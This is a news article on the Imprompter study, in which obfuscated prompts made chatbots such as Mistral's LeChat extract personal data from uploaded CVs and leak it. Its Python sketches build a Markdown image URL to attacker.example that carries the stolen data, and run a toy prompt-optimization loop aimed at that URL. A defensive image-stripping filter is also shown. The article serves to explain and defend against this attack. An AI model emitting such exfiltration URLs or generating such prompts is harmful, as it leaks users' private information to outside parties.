In Short:
Researchers have shown that AI chatbots can be tricked into revealing personal information through obfuscated, misleading prompts. They tested this by uploading CVs to chatbot conversations, exposing serious privacy risks. Mistral AI responded by fixing the issue, while experts warn that as AI usage grows, so does the potential for attacks. Users should be cautious about the information they share and about prompts copied from the internet.
Recent research has revealed significant vulnerabilities in how chatbots handle personal data contained in user-uploaded documents such as CVs. In a real-world attack, the study suggests, individuals could be socially engineered into believing that an unintelligible prompt would do something useful for them, such as improving their CV. The researchers pointed to the many websites that offer ready-made prompts, and in testing they found that when a CV was uploaded to a chatbot conversation, the malicious prompt could pull out the personal information contained in that file.
Research Insights
Earlence Fernandes, an assistant professor at UCSD and a contributor to the study, described the complexity of the attack method. According to Fernandes, the obfuscated prompt must accomplish several tasks at once: identify personal information, build a working URL from it, apply Markdown syntax, and do all of this without revealing its malicious intent to the user. He likened this type of attack to traditional malware, emphasizing its ability to perform unintended actions without the user’s knowledge.
“Typically, you would need to write extensive computer code to accomplish this in conventional malware,” said Fernandes. “In this case, it’s intriguing that all of that functionality can be encapsulated within a relatively brief and nonsensical prompt.”
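To make the mechanism concrete, the sketch below illustrates the kind of exfiltration channel described above. It is illustrative only: the attacker domain (attacker.example), the query-parameter scheme, and the decoder function are assumptions, not the payload format from the paper. The idea is that the coerced model emits a Markdown image whose URL carries data drawn from the conversation, and rendering that image sends the data to an external server.

```python
# Illustrative sketch only: the general shape of a Markdown-based exfiltration
# channel, not the exact payload from the paper. The domain "attacker.example"
# and the query-parameter scheme are assumptions.
from urllib.parse import quote, urlparse, parse_qs

# What a hijacked response might look like: the model is coerced into emitting
# a Markdown image whose URL carries personal data pulled from the conversation.
pii = "Jane Doe; jane.doe@example.com; +1 555 0100"
hijacked_output = f"![a](https://attacker.example/log?d={quote(pii)})"

# When the chat UI renders the image, the browser requests the URL and the
# attacker's server recovers the data from the query string.
def recover(url_markdown: str) -> str:
    url = url_markdown[url_markdown.index("(") + 1 : url_markdown.rindex(")")]
    return parse_qs(urlparse(url).query)["d"][0]

print(recover(hijacked_output))  # -> "Jane Doe; jane.doe@example.com; +1 555 0100"
```

Because the request happens when the interface renders the response, the user never has to click anything.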
Mistral AI’s Response
In response to the findings, a spokesperson for Mistral AI acknowledged the importance of security researchers in enhancing user safety. “Following this feedback, Mistral AI promptly implemented the appropriate remediation to address the situation,” the spokesperson stated. The company classified the issue as having “medium severity” and introduced a fix that prevents the chat’s Markdown renderer from calling external URLs, effectively disabling external image loading.
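Mistral AI has not published implementation details, so the snippet below is only a rough sketch of the general class of mitigation described: dropping Markdown images that point at external hosts before the renderer can fetch them. The function name, regex, and allow-list are assumptions for illustration, not the company’s actual fix.

```python
# Rough illustration of the mitigation class described above (blocking external
# image loads in rendered Markdown). This is NOT Mistral AI's implementation;
# the allow-list and function name are assumptions for the example.
import re

ALLOWED_IMAGE_HOSTS = ("chat.example.com",)  # hypothetical first-party host

IMAGE_PATTERN = re.compile(r"!\[[^\]]*\]\((?P<url>[^)\s]+)[^)]*\)")

def strip_external_images(markdown: str) -> str:
    """Drop Markdown images whose URL does not point at an allowed host."""
    def _keep_or_drop(match: re.Match) -> str:
        url = match.group("url")
        if any(url.startswith(f"https://{host}/") for host in ALLOWED_IMAGE_HOSTS):
            return match.group(0)
        return ""  # remove the image, so no outbound request is ever made
    return IMAGE_PATTERN.sub(_keep_or_drop, markdown)

print(strip_external_images("Hi ![a](https://attacker.example/log?d=secret)"))
# -> "Hi "
```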
Fernandes noted that the update from Mistral AI may mark one of the first instances in which an adversarial prompt led to a corrective action on an LLM product, rather than merely filtering out the prompt. He cautioned, however, that restricting the capabilities of LLM agents could ultimately be “counterproductive.”
Commitment to Security
Meanwhile, the creators of ChatGLM released a statement asserting that they have established security measures to safeguard user privacy. “Our model is secure, and we have consistently prioritized model security and privacy protection,” the statement emphasized. “By open-sourcing our model, we aim to leverage the strength of the open-source community to thoroughly inspect and evaluate all aspects of these models’ capabilities, including security.”
A High-Risk Activity
Dan McInerney, the lead threat researcher at security firm Protect AI, remarked on the significance of the Imprompter paper, which describes an algorithm for automatically generating prompts that can be used in various exploits, including the exfiltration of personally identifiable information (PII), image misclassification, and malicious use of the tools available to LLM agents. While some of the individual attack methods may resemble earlier techniques, McInerney emphasized that the algorithm ties these approaches together. “This represents a progression in automated LLM attacks rather than merely identifying new vulnerabilities,” he explained.
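The paper’s algorithm is not reproduced here. As a rough illustration of what “automatically generating prompts” involves, the toy sketch below runs a simple random token-substitution search that keeps changes making an attacker-chosen continuation more likely; real automated attacks are far more sophisticated than this. The model name, target string, and search budget are placeholders.

```python
# Toy sketch of automated adversarial-prompt search: NOT the Imprompter
# algorithm, just a minimal random-substitution loop that keeps token changes
# which make an attacker-chosen continuation more likely. Model name and
# target text are placeholders.
import random
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

MODEL = "gpt2"  # placeholder local model for the sketch
tok = AutoTokenizer.from_pretrained(MODEL)
model = AutoModelForCausalLM.from_pretrained(MODEL).eval()

target = "![a](https://attacker.example/log?d="  # attacker-chosen continuation
target_ids = tok(target, return_tensors="pt").input_ids

def loss_for(prompt_ids: torch.Tensor) -> float:
    """Language-model loss of the target continuation given the prompt."""
    ids = torch.cat([prompt_ids, target_ids], dim=1)
    labels = ids.clone()
    labels[:, : prompt_ids.shape[1]] = -100  # score only the target span
    with torch.no_grad():
        return model(input_ids=ids, labels=labels).loss.item()

# Start from a fixed-length random prompt and greedily accept improving swaps.
prompt_ids = torch.randint(0, tok.vocab_size, (1, 20))
best = loss_for(prompt_ids)
for _ in range(200):  # small budget; real attacks run far longer
    candidate = prompt_ids.clone()
    candidate[0, random.randrange(candidate.shape[1])] = random.randrange(tok.vocab_size)
    score = loss_for(candidate)
    if score < best:
        prompt_ids, best = candidate, score

print(tok.decode(prompt_ids[0]), best)
```

The point is simply that the malicious prompt is the output of an optimization loop rather than something a human writes by hand.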
He further cautioned that as LLM agents gain widespread adoption and individuals grant them increased authority to perform actions on their behalf, the potential for attacks intensifies. “Deploying an LLM agent that accepts arbitrary user input should be regarded as a high-risk activity, necessitating extensive and innovative security testing prior to rollout,” McInerney stated.
For organizations, this underscores the necessity of understanding how an AI agent interacts with data and identifying potential abuse vectors. On an individual level, as with standard security advice, users should carefully consider how much personal information they disclose to any AI application or company. Moreover, when using prompts sourced from the internet, it is crucial to be cautious about where they come from.